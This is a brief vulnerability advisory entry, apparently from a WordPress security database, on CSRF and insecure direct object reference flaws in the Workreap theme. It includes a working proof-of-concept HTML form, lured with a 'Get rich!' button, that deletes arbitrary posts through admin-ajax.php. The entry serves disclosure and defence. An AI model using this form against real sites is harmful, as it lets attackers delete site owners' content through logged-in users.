Several AJAX actions available in the theme lacked CSRF protections, as well as allowing insecure direct object references that were not validated. This allows an attacker to trick a logged in user to submit a POST request to the vulnerable site, potentially modifying or deleting arbitrary objects on the target site.
<form action="http://localhost:8888/wp-admin/admin-ajax.php" method="POST"> <input name="action" type="hidden" value="workreap_portfolio_remove"> <!-- note value does not have to be a portfolio, any post id will do --> <input name="id" type="hidden" value="1361"> <input type="submit" value="Get rich!"> </form>
MULTI
Harald Eilertsen (Jetpack)
Harald Eilertsen (Jetpack)
Yes
2021-07-02 (about 1 years ago)
2021-07-10 (about 1 years ago)
2022-01-26 (about 1 years ago)